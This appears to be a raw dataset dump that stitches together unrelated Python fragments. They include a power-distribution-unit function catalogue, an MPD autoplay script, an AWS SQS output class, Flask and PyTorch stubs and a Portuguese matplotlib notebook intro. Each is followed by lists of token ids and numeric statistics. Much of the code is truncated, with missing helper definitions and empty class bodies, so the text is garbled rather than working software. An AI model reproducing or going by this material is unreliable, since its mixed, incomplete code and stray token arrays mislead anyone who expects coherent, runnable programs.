    (10018, "UseDefaultNTPServer", "", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10019, "UseNTP", "", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10020, "SNMPTrapRecvIP", "SNMP trap server IP-address", 1, 1, "TYPE_IP", dict(size=4)),
    (10021, "SNMPTrapRecvPort", "", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="", scale=0, min=0, max=65536)),
    (10022, "SNMPCommunityRead", "", 1, 1, "TYPE_STRING", dict(length=16)),
    (10023, "SNMPCommunityWrite", "", 1, 1, "TYPE_STRING", dict(length=16)),
    (10024, "SNMPControl", "", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10025, "TelnetCLIPort", "", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="", scale=0, min=0, max=65536)),
    (10026, "TelnetUARTMUXPort", "", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="", scale=0, min=0, max=65536)),
    (10027, "SelectUARTMUCChannel", "", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (10028, "LDAPServer", "", 1, 1, "TYPE_IP", dict(size=4)),
    (10029, "UseLDAPServer", "", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10030, "Beeper", "Beeper control enable beeper for n seconds", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="s", scale=0, min=0, max=256)),
    (10031, "DisplayLock", "", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10032, "DisplayTimeOn", "", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="min", scale=0, min=0, max=256)),
    (10033, "DisplayRotation", "", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10034, "PortName", "Name of the port", 1, 1, "TYPE_STRING", dict(length=16)),
    (10035, "PortState",
     "The state of the port, only used to set the port state, see current port state to get the port state",
     1, 1, "TYPE_ENUM", dict(size=1)),
    (10036, "CurrentPriorOff",
     "Priority level switch off when maximum total current exceeds threshold", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="1H8L", scale=0, min=0, max=256)),
    (10037, "DelayOn", "Port activation delay after power recycle", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="s", scale=0, min=0, max=65536)),
    (10038, "MaxCurrentOff", "Maximum port current switch off level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="A", scale=3, min=0, max=65536)),
    (10039, "MaxCurrentWarning", "Maximum port current warning level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="A", scale=3, min=0, max=65536)),
    (10040, "MaxPowerOff", "Maximum port power switch off level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="W", scale=1, min=0, max=65536)),
    (10041, "MaxPowerWarning", "Maximum port power warning level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="W", scale=1, min=0, max=65536)),
    (10042, "MaxTotalCurrentOff", "Maximum total current switch off level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="A", scale=3, min=0, max=65536)),
    (10043, "MaxTotalCurrentWarning", "Maximum total current warning level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="A", scale=3, min=0, max=65536)),
    (10044, "MaxTotalPowerOff", "Maximum total power switch off level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="W", scale=1, min=0, max=65536)),
    (10045, "MaxTotalPowerWarning", "Maximum total power warning level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="W", scale=1, min=0, max=65536)),
    (10046, "MaxVoltageOff", "Maximum voltage switch off level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="V", scale=2, min=0, max=65536)),
    (10047, "MaxVoltageWarning", "Maximum voltage warning level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="V", scale=2, min=0, max=65536)),
    (10048, "MinVoltageOff", "Minimum voltage switch off level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="V", scale=2, min=0, max=65536)),
    (10049, "MinVoltageWarning", "Minimum voltage warning level", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="V", scale=2, min=0, max=65536)),
    (10050, "ActiveEnergyReset", "Active Energy", 1, 1,
     "TYPE_COMMAND", dict(size=8, unit="kWh", scale=3, min=0, max=4294967296)),
    (10051, "ApparentEnergyReset", "Apparent Energy", 1, 1,
     "TYPE_COMMAND", dict(size=8, unit="kVAh", scale=3, min=0, max=4294967296)),
    (10052, "MinTemperatureWarning", "", 1, 1,
     "TYPE_SIGNED_NUMBER", dict(size=2, unit="C", scale=1, min=-32768, max=32768)),
    (10053, "MaxTemperatureWarning", "", 1, 1,
     "TYPE_SIGNED_NUMBER", dict(size=2, unit="C", scale=1, min=-32768, max=32768)),
    (10054, "MinHumidityWarning", "", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="%RH", scale=1, min=0, max=65536)),
    (10055, "MaxHumidityWarning", "", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="%RH", scale=1, min=0, max=65536)),
    (10056, "LedStatus", "To set Status of a led", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (10057, "MatrixDisplayStatus", "To set Status of a small matrix display", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (10058, "Baudrate", "To set baudrate for circular buffers", 1, 1, "TYPE_ENUM", dict(size=1)),
    (10059, "P_PID", "Proportional value of PID", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="", scale=0, min=0, max=4294967296)),
    (10060, "I_PID", "Integral value of PID", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="", scale=0, min=0, max=4294967296)),
    (10061, "D_PID", "Derivative value of PID", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="", scale=0, min=0, max=4294967296)),
    (10062, "WeightOfTempsensor",
     "Gives the weight of a tempsensor to the input of a PID controller", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (10063, "TargetTemp", "Temperature to be set for PID controller", 1, 1,
     "TYPE_SIGNED_NUMBER", dict(size=2, unit="", scale=1, min=-32768, max=32768)),
    (10064, "MaximumPWM", "Maximum value of pwm to control ventilators", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="%", scale=0, min=0, max=256)),
    (10065, "MinimumPWM", "Minimum value of pwm to control ventilators", 1, 1,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="%", scale=0, min=0, max=256)),
    (10066, "Startuptime", "", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="s", scale=0, min=0, max=4294967296)),
    (40000, "JumpBoot",
     "Enter bootloader mode. Normally this command is only sent to application program. When the bootloader is already running, this command will only reply a positive acknowledge.",
     1, 1, "TYPE_COMMAND", dict(size=0)),
    (40001, "GotoAddressmode", "Addressing mode on/off", 0, 0, "TYPE_COMMAND", dict(size=1)),
    (40002, "GotoFactoryMode", "", 0, 1, "TYPE_COMMAND", dict(size=16)),
    (40003, "DoSnapshot", "", 0, 0, "TYPE_COMMAND", dict(size=1)),
    (40004, "SampleChannelTime", "", 1, 1, "TYPE_COMMAND", dict(size=1)),
    (40005, "SampleChannelFFT", "", 1, 1, "TYPE_COMMAND", dict(size=1)),
    (40006, "FlushCallibData", "", 0, 0, "TYPE_COMMAND", dict(size=1)),
    (40007, "ModNum",
     "To retrieve the number of modules connected to the device. The device itself is treated as module 0.",
     1, 0, "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (40008, "ModInfo", "To retrieve module information", 1, 0, "TYPE_STRING", dict(length=26)),
    (40009, "ApplyIPSettings", "", 0, 1, "TYPE_COMMAND", dict(size=1)),
    (50000, "Monitor", "Get the monitor values", 1, 0, "TYPE_POINTER", dict()),
    (50001, "Parameter", "get all parameters", 1, 0, "TYPE_POINTER", dict()),
    (50002, "CircularReadBuffer",
     "Read from slave(application connected to rs232) to master or from master to application",
     1, 0, "TYPE_CIRCULAR_BUFFER", dict(size=1)),
    (50003, "CircularWriteBuffer",
     "Write of data from application to master or from master to slave(application connected to rs232)",
     0, 1, "TYPE_CIRCULAR_BUFFER", dict(size=1)),
    (50004, "VoltageTimeSamples", "Get the voltage samples in oscilloscope view mode",
     1, 0, "TYPE_RAW", dict(size=1)),
    (50005, "CurrentTimeSamples", "Get the current samples in oscilloscope view mode",
     1, 0, "TYPE_RAW", dict(size=1)),
    (50006, "VoltageFreqSamples", "Get the frequency analyse of the voltage",
     1, 0, "TYPE_RAW", dict(size=1)),
    (50007, "CurrentFreqSamples", "Get the frequency analyse of the current",
     1, 0, "TYPE_RAW", dict(size=1)),
    (50008, "Eeprom", "read or write eeprom data", 0, 0, "TYPE_RAW", dict(size=1)),
    (50009, "CallibrationValues", "", 1, 0, "TYPE_RAW", dict(size=2)),
    (60000, "BootReadID",
     "Get the identification of the microcontroller. The response contains the values stored at memory address 0xFF0000 and 0xFF00002. (8 bytes in total)",
     0, 0, "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (60001, "BootJumpApp", "Jump to the application, which starts at 0x4000. ",
     0, 1, "TYPE_COMMAND", dict(size=0)),
    (40013, "UDPUser", "User mode for UDP commands", 0, 1, "TYPE_COMMAND", dict(size=1)),
    (60002, "BootXTEA",
     "Process a block of encrypted program memory data. The decrypted data will then be written into the program (flash) memory.",
     0, 0, "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (60004, "BootErase",
     "Erase a page of program memory. The message takes one parameter, i.e. the page number. Valid page number for the dsPICFJ256 are from 16 to 170.",
     0, 0, "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="", scale=0, min=0, max=65536)),
    (60005, "BootPageRange",
     "To get the number of pages of the application firmware memory. Only pages within this range can be erased.",
     0, 0, "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="", scale=0, min=0, max=65536)),
    (60010, "BootParameters",
     "To set or retrieve the parameters of the device stored in flash during production (factory mode) such as: - Application firmware id (RTF-number) - Application firmware version - Hardware ID (RTH-number) - Hardware version - UID ",
     1, 0, "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="", scale=0, min=0, max=256)),
    (40010, "DHCPReset", "Reset DHCP", 0, 1, "TYPE_COMMAND", dict(size=1)),
    (14, "CurrentIP",
     "Gives the current IP. When DHCP is on, you can see here what ip is given by the DHCP server",
     1, 0, "TYPE_IP", dict(size=4)),
    (10067, "UserLogin", "User Login", 1, 1, "TYPE_STRING", dict(length=16)),
    (10068, "UserPassword", "User Password", 0, 1, "TYPE_STRING", dict(length=16)),
    (10069, "RestrictedUserLogin", "Restricted User Login", 1, 1, "TYPE_STRING", dict(length=16)),
    (10070, "RestrictedUserPassword", "Restricted User Password", 0, 1, "TYPE_STRING", dict(length=16)),
    (60020, "BootAppFwID", "Identification of the firmware", 1, 0, "TYPE_STRING", dict(length=8)),
    (60021, "BootAppFwVersion", "Identification of the hardware", 1, 0, "TYPE_VERSION", dict(size=4)),
    (15, "ApparentPower",
     "Apparent power (this is the product of the current and the voltage)", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="VA", scale=1, min=0, max=65536)),
    (16, "PowerFactor", "Powerfactor ", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="%", scale=0, min=0, max=256)),
    (5010, "MinCurrent", "Minimum port current occurred since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=6, unit="A", scale=3, min=0, max=65536)),
    (5011, "MinPower", "Minimum port power occured since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=6, unit="W", scale=1, min=0, max=65536)),
    (5012, "MinPowerFactor", "Minimum powerfactor occured per port since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=5, unit="%", scale=0, min=0, max=256)),
    (5013, "MaxPowerFactor", "Maximum powerfactor occured per port since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=5, unit="%", scale=0, min=0, max=256)),
    (17, "TotalCurrent", "Total current", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=2, unit="A", scale=3, min=0, max=65536)),
    (18, "TotalRealPower", "Total real power", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="W", scale=1, min=0, max=4294967296)),
    (19, "TotalApparentPower", "Total apparent power", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="VA", scale=1, min=0, max=4294967296)),
    (20, "TotalActiveEnergy", "Total active energy", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="kWh", scale=3, min=0, max=4294967296)),
    (21, "TotalApparentEnergy", "Total apparent energy", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=4, unit="kVAh", scale=3, min=0, max=4294967296)),
    (22, "TotalPowerFactor", "Total power factor", 1, 0,
     "TYPE_UNSIGNED_NUMBER", dict(size=1, unit="%", scale=0, min=0, max=256)),
    (5014, "MinTotalCurrent", "Minimum port current occurred since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=6, unit="A", scale=3, min=0, max=65536)),
    (5015, "MinTotalPower", "Minimum port power occurred since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=6, unit="W", scale=1, min=0, max=65536)),
    (5016, "MinTotalPowerFactor", "Minimum total power factor occurred since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=5, unit="%", scale=0, min=0, max=256)),
    (5017, "MaxTotalPowerFactor", "Maximum total power factor occurred since last reset", 1, 1,
     "TYPE_UNSIGNED_NUMBER_WITH_TS", dict(size=5, unit="%", scale=0, min=0, max=256)),
    (10071, "ActiveTotalEnergyReset",
     "Active Total Energy / time of reset + value at that time", 1, 1,
     "TYPE_COMMAND", dict(size=8, unit="kWh", scale=3, min=0, max=4294967296)),
    (10072, "ApparentTotalEnergyReset",
     "Apparent Total Energy / time of reset + value at that time", 1, 1,
     "TYPE_COMMAND", dict(size=8, unit="kVAh", scale=3, min=0, max=4294967296)),
]

# Register every catalogue entry in the same order as the original inline code
# so ``functions`` receives identical keys, objects and attribute values.
for _guid, _name, _desc, _read, _write, _vtype, _vfields in _FUNCTION_TABLE:
    _register(_guid, _name, _desc, _read, _write, _vtype, _vfields)

# The original inline sequence left the module-level name ``func`` bound to
# the last record it created; preserve that binding for any code that follows.
func = functions[10072]
func = Functions()
functions[50010] = func
func.guid = 50010
func.name = "MonitorAutoRefresh"
func.description = "Get the monitor values from the module that are auto refreshed"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[40011] = func
func.guid = 40011
func.name = "Role"
func.description = "To see in which role you are logged in"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[40012] = func
func.guid = 40012
func.name = "UserLoginAndPassword"
func.description = "Contains 1 loginname and 1 password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 32
func = Functions()
functions[40014] = func
func.guid = 40014
func.name = "DoHotReset"
func.description = "Hot reset of the device"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
| [
2,
279,
2645,
600,
25,
15560,
28,
54,
15,
1264,
198,
6738,
449,
8142,
38765,
1330,
474,
198,
198,
41,
16811,
11159,
796,
474,
13,
8692,
37724,
13,
15252,
628,
198,
220,
220,
220,
1303,
15965,
2977,
628,
198,
12543,
2733,
796,
23884,... | 2.68151 | 16,798 |
if __name__ == '__main__':
main()
| [
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 2.157895 | 19 |
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: bearing.py
@time: 2020-02-29 23:23
"""
from flask_sqlalchemy import SQLAlchemy
from app_backend import app
db_bearing = SQLAlchemy(app)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
21004,
25,
3384,
69,
12,
23,
198,
198,
37811,
198,
31,
9800,
25,
1976,
33255,
258,
198,
31,
43776,
25,
9485,
1925,
1670,
198,
31,
7753,
25,
14121,
13,
9078,
198,
31,
2435,
25,
... | 2.590909 | 88 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
Keeps your MPD playlist filled with music you like
Dependencies : python-mpd
pysqlite
'''
import os
import mpd
import random
import sqlite3
import time
import io
import sys
import socket
## Config
playtime = 70 # Percentage of a song that must be played before
# play count is incremented
mintime = 25 # Minimum length of a track for it
# to be considered a song (in seconds)
flood_delay = 12*60 # Minutes to wait before adding the same song again
tries = 10 # Retry connecting this many times
## /Config
version = "2.0 DEV"
helpstring = """Syntax : """ + sys.argv[0] + """ [command]
command can be one of :
radio [on|off|toggle]
trigger [number]
info [path]
start
stop (synonym: kill)
loglevel [debug|notice|warning|error]
help
version"""
enc = sys.getfilesystemencoding()
#enc = "UTF-8"
def log(msg, stdout=False):
"""Logs to file, and optionally to stdout. Obvious enough"""
alllevels = "DINWE" # Debug, Info, Notice, Warning, Error
loglevels = alllevels[alllevels.find(logLevel):]
if stdout:
print msg[2:]
if msg[0] in loglevels:
logio.write(unicode(msg, enc)+"\n")
def addsong():
"""Adds a semi-random song to the playlist"""
rand = random.uniform(-0.5, 2)
cursor.execute("SELECT file, listened, added FROM songs "
"WHERE karma>? AND time < ? "
"AND NOT duplicate ORDER BY random() LIMIT 1;",
(rand, int(time.time()-(60*(flood_delay-trigger*3)))))
songdata = cursor.fetchone()
if not songdata:
updateone()
addsong()
else:
newkarma = karma(songdata[1], songdata[2]+1)
cursor.execute(
"UPDATE songs SET added=?, karma=?, time=? WHERE file=?",
(songdata[2]+1, newkarma, int(time.time()), songdata[0],)
)
cursor.execute(
"SELECT inode, dev FROM songs WHERE file=?;",
(songdata[0],)
)
one = cursor.fetchone()
if one and one[0]:
cursor.execute(
"""UPDATE SONGS SET added=?, karma=?, time=? WHERE inode=?
AND dev=?""", (songdata[2]+1, newkarma, int(time.time()),
one[0], one[1])
)
db.commit()
try:
client.add(songdata[0].encode(enc))
log("I Added " + songdata[0].encode(enc))
log("D A:" + str(songdata[2]+1) + ", K:" +
str(newkarma))
except mpd.CommandError:
log("W Couldn't add " + songdata[0].encode(enc))
update(songdata[0])
addsong()
allsongs = []
logLevel = "D"
datahome = (os.getenv("XDG_DATA_HOME") or os.getenv("HOME") +
"/.local/share") + "/autoplay"
if not os.access(datahome, os.W_OK):
try:
os.makedirs(datahome)
except os.error:
log("E Couldn't access nor create" + datahome + ", quitting", True)
exit(2)
password = None
host = os.getenv("MPD_HOST", "127.0.0.1")
atloc = host.find("@")
if(atloc != -1):
password = host[:atloc]
host = host[atloc+1:]
port = os.getenv("MPD_PORT", "6600")
musicdir = os.getenv("MPD_MUSIC_DIR") or os.getenv("mpd_music_dir")
logio = io.open(datahome + "/log", "at", buffering=1, encoding=enc)
if __name__ == "__main__":
silent = False
s = getServSock()
try:
if len(sys.argv) <= 1 or sys.argv[1] != "start":
s.sendall(" ".join(sys.argv[1:]) + "\n")
data = s.recv(1024)
while data != "":
print data,
data = s.recv(1024)
except KeyboardInterrupt:
pass
s.shutdown(socket.SHUT_RDWR)
s.close()
# vim: tw=70 ts=2 sw=2
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
7061,
6,
198,
15597,
82,
534,
4904,
35,
33178,
5901,
351,
2647,
345,
588,
198,
198,
35,
2690,
3976,
1058,
... | 2.334444 | 1,501 |
import json
import logging
from collections import Counter
from typing import Union
import boto3
from .... import settings
from . import OutputCtxManagerBase
logger = logging.getLogger("cliexecutor")
SQS = boto3.client("sqs", endpoint_url=settings.SQS_ENDPOINT, region_name="ap-northeast-1")
class SQSRecordOutputCtxManager(OutputCtxManagerBase):
"""Predictor.predict() resutls will use `put_records()` to output to the envar defined SQS Queue"""
@classmethod
def required_kwargs(cls) -> tuple:
"""
Define the required fields for Class instantiation.
Fields defined here can be used as environment variables by prefixing the value with 'OUTPUT_CTXMGR_' and putting values in uppercase.
Ex:
OUTPUT_CTXMGR_SQS_QUEUE_URL
"""
required = ("sqs_queue_url",)
return required
def put_records(self, records: Union[dict, list]):
"""
Call to send result defined in JSON parsable `message_body` to SQS.
.. note::
given `message_body` will be converted to JSON and sent to the defined SQS Queue.
"""
summary = Counter()
max_sqs_message_body_bytes = 2048
for record in records:
message_body_json = json.dumps(record)
message_body_utf8_bytes = len(message_body_json.encode("utf8"))
logger.info(f"Message Bytes={message_body_utf8_bytes}")
if message_body_utf8_bytes > max_sqs_message_body_bytes:
logger.error(f"message_body_utf8_bytes({message_body_utf8_bytes}) > max_sqs_message_body_bytes({max_sqs_message_body_bytes})")
logger.debug(f"Queuing({self.sqs_queue_url}): {record}")
response = SQS.send_message(QueueUrl=self.sqs_queue_url, MessageBody=message_body_json)
logger.debug(f"response: {response}")
summary["sent_messages"] += 1
return summary
| [
11748,
33918,
198,
11748,
18931,
198,
6738,
17268,
1330,
15034,
198,
6738,
19720,
1330,
4479,
198,
198,
11748,
275,
2069,
18,
198,
198,
6738,
19424,
1330,
6460,
198,
6738,
764,
1330,
25235,
34,
17602,
13511,
14881,
198,
198,
6404,
1362,
... | 2.427848 | 790 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import ConvLayer, Decoder, DigitCaps, PrimaryCaps
__all__ = [
'CapsNet',
]
class CapsNet(nn.Module):
'''Capsule Network'''
@staticmethod
@staticmethod
@staticmethod
| [
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
198,
198,
6738,
764,
75,
6962,
1330,
34872,
49925,
11,
34580,
11,
7367,
270,
34,
1686,
11,
21087,
34,
1686,
198,
198,
834,
... | 2.522523 | 111 |
import csv
import dill
import itertools
import math
import pandas as pd
import numpy as np
from itertools import combinations
from sklearn.model_selection import train_test_split
from tqdm import tqdm
med_file = 'data/PRESCRIPTIONS.csv'
diag_file = 'data/DIAGNOSES_ICD.csv'
procedure_file = 'data/PROCEDURES_ICD.csv'
ndc2atc_file = 'data/ndc2atc_level4.csv'
cid_atc = 'data/drug-atc.csv'
ndc2rxnorm_file = 'data/ndc2rxnorm_mapping.txt'
drug_ddi_file = 'data/drug-DDI.csv'
drug_stitch2atc_file = 'data/drug_stitch2atc.csv'
DDI_MATRIX_FILE = 'data/ddi_matrix_tail_top100.pkl'
EHR_MATRIX_FILE = 'data/ehr_matrix_1.0.pkl'
PATIENT_RECORDS_FILE = 'data/patient_records.pkl'
PATIENT_RECORDS_FINAL_FILE = 'data/patient_records_final.pkl'
PATIENT_RECORDS_FILE_ACCUMULATE = 'data/patient_records_accumulate_tail_top100.pkl'
PATIENT_RECORDS_FILE_SEPARATE = 'data/patient_records_separate_tail_top100.pkl'
CONCEPTID_FILE = 'data/concepts2id_mapping.pkl'
# DIAGNOSES_INDEX = 0
# PROCEDURES_INDEX = 1
# MEDICATIONS_INDEX = 2
VOC_FILE = 'data/voc.pkl'
GRAPH_FILE = 'data/graph.pkl'
# ===================处理原始EHR数据,选取对应记录================
# we borrow part of the codes from https://github.com/sjy1203/GAMENet
# ======================
# given a sequence of medical concepts, obtain their ids and store the mapping
if __name__ == '__main__':
process_ehr()
map_concepts2id()
build_ddi_matrix()
build_patient_records()
data_sampling()
build_co_occurrence_matrix()
| [
11748,
269,
21370,
198,
11748,
288,
359,
198,
11748,
340,
861,
10141,
198,
11748,
10688,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
340,
861,
10141,
1330,
17790,
198,
6738,
1341,
35720... | 2.292496 | 653 |
from unittest import TestCase
from concurrent.futures import ThreadPoolExecutor
from mock import patch
import os
import platform
from aws_lambda_builders.actions import ActionFailedError
from aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli import DotnetCLIExecutionError
from aws_lambda_builders.workflows.dotnet_clipackage.actions import GlobalToolInstallAction, RunPackageAction
@patch.object(GlobalToolInstallAction, "_GlobalToolInstallAction__tools_installed", False)
| [
6738,
555,
715,
395,
1330,
6208,
20448,
198,
198,
6738,
24580,
13,
69,
315,
942,
1330,
14122,
27201,
23002,
38409,
198,
6738,
15290,
1330,
8529,
198,
11748,
28686,
198,
11748,
3859,
198,
198,
6738,
3253,
82,
62,
50033,
62,
50034,
13,
... | 3.717557 | 131 |
import re
from collections import defaultdict
import rules
attrs_re = re.compile(r"""\s*(\w+)\s*=\s*(["'])(.*?)(?<!\\)\2""", re.DOTALL)
class HTMLFilter:
"""Simple HTML white list filter.
Usage:
hf = HTMLFilter()
filtered_html = hf.filter(html)
The filter parses the code for < and > characters.
It tries to correct malformed tags and close them.
Use it with a WYSIWYG editor on the client side
to convert user's < and > inputs into < and >
For the tough stuff, prefer BeautifulSoup.
"""
| [
11748,
302,
198,
6738,
17268,
1330,
4277,
11600,
198,
198,
11748,
3173,
198,
198,
1078,
3808,
62,
260,
796,
302,
13,
5589,
576,
7,
81,
37811,
59,
82,
9,
38016,
86,
10,
19415,
82,
9,
28,
59,
82,
9,
7,
14692,
20520,
5769,
15885,
3... | 2.674757 | 206 |
import time
class get_rate_limited_function(object):
"""
Close over a function and a time limit in seconds. The resulting object can
be called like the function, but will not delegate to the function if that
function was called through the object in the time limit.
Clients can ignore the time limit by calling the function directly as the
func attribute of the object.
"""
def merge_dicts(*dict_args):
"""
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
| [
11748,
640,
628,
198,
4871,
651,
62,
4873,
62,
10698,
62,
8818,
7,
15252,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
13872,
625,
257,
2163,
290,
257,
640,
4179,
287,
4201,
13,
383,
7186,
2134,
460,
198,
220,
220,
220,
30... | 3.349754 | 203 |
# -*- coding: utf-8 -*-
"""
Extensions that introduce `basename` and `dirname` as Jinja2 filters.
Examples
--------
my_path = "/some/absolute/path/with/file.txt"
{{ my_path | basename }}
Will fill in `file.txt`.
"""
from __future__ import absolute_import
import os.path
from jinja2.ext import Extension
__all__ = ("OSPathExtension",)
class OSPathExtension(Extension):
"""A Jinja2 extension that introduces `os.path` functionality."""
tags = frozenset(["basename", "dirname", "abspath"])
def __init__(self, environment):
"""Initialize the extension and prepare the Jinja2 environment."""
super(OSPathExtension, self).__init__(environment)
for name in self.tags:
environment.filters[name] = getattr(os.path, name)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
11627,
5736,
326,
10400,
4600,
12093,
12453,
63,
290,
4600,
15908,
3672,
63,
355,
17297,
6592,
17,
16628,
13,
198,
198,
27730,
198,
982,
628,
220,
220,
... | 2.736842 | 285 |
from __future__ import print_function
import pdb
import pytest
import sys
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
11748,
279,
9945,
198,
11748,
12972,
9288,
198,
11748,
25064,
628,
628,
628,
628,
198
] | 3.416667 | 24 |
# STDLIB
import sys
# main{{{
def main() -> None:
"""
the main method, prints hello world
Parameter
----------
none
none
Result
----------
none
Exceptions
----------
none
Examples
----------
>>> main()
Hello World - by PizzaCutter
"""
# main}}}
print("Hello World - by PizzaCutter")
if __name__ == "__main__":
print(b'this is a library only, the executable is named "pct_python_default_test_cli.py"', file=sys.stderr)
| [
2,
3563,
19260,
9865,
198,
11748,
25064,
628,
198,
2,
1388,
27007,
90,
198,
4299,
1388,
3419,
4613,
6045,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
262,
1388,
2446,
11,
20842,
23748,
995,
628,
198,
220,
220,
220,
25139,
235... | 2.485577 | 208 |
import ctypes
from lib.logger import log
from receiver.game_version import CrossGamePacketHeader
class PacketHeader(CrossGamePacketHeader):
"""
The Packet Header is the same across F12020 and F12021
Hence we use one shared HeaderClass for now
May have to upgrade that logic if it changes
"""
pass | [
11748,
269,
19199,
198,
198,
6738,
9195,
13,
6404,
1362,
1330,
2604,
198,
6738,
9733,
13,
6057,
62,
9641,
1330,
6372,
8777,
47,
8317,
39681,
628,
198,
198,
4871,
6400,
316,
39681,
7,
21544,
8777,
47,
8317,
39681,
2599,
198,
220,
220,
... | 3.25 | 100 |
# Plotagem básica com _matplotlib_
## Visualização de dados
A visualização de dados é um campo do conhecimento bastante antigo que foi trazido à mostra muito recentemente com a expansão do "Big Data". Seu principal objetivo é representar dados e informações graficamente por meio de elementos visuais como tabelas, gráficos, mapas e infográficos. Diversas ferramentas estão disponíveis para tornar a interpretação de dados mais clara, compreensível e acessível.
No contexto da análise de dados, a visualização de dados é um componente fundamental para a criação de relatórios de negócios, painéis de instrumentos (_dashboards_) e gráficos multidimensionais que são aplicáveis às mais diversas disciplinas, tais como Economia, Ciência Política e, principalmente, todo o núcleo de ciências exatas (Matemática, Estatística e Computação).
